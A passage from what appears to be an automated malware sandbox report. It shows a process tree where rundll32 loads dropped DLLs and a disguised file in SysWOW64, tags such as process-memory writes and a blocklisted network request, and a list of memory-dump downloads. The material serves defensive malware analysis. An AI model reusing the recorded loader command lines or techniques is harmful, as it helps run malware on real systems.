            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll #1
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1928
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll #1
              4⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:1316
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zyhm\zomuht.ouh",RunDLL
                5⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:1776

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1316-18-0x0000000000180000-0x00000000001A0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1664-21-0x000007FEF7140000-0x000007FEF73BA000-memory.dmp

        Filesize

        2.5MB

        Download

      • memory/1776-20-0x0000000000160000-0x0000000000180000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1780-9-0x000000001B8D0000-0x000000001B8D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1780-8-0x0000000002600000-0x0000000002601000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1780-7-0x0000000002430000-0x0000000002431000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1780-5-0x00000000023D0000-0x00000000023D1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1780-6-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1780-10-0x000000001B960000-0x000000001B961000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1780-4-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp

        Filesize

        9.9MB

        Download